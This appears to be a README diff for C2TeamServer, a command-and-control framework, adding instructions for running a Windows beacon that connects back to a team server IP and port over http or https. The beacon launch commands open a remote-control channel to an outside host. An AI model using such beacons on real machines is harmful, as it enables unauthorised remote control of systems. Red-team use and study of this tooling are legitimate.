maxDcb/C2TeamServer/README.md

 ![alt text](https://github.com/maxDcb/C2TeamServer/blob/master/images/ReleaseModulesBeacons.png?raw=true)

+To launch a beacon available in ./Release/Beacons use the following syntax on a windows machine:

 ```
+.\BeaconHttp.exe IP_TEAMSERVER PORT_LISTENER http/https
 .\BeaconHttp.exe 10.10.52.5 8443 https
+.\BeaconHttp.exe 10.10.52.5 80 http
 ```

 When the Beacon is started and connect to the TeamServer, a new session is started from where you can interact with the Beacon: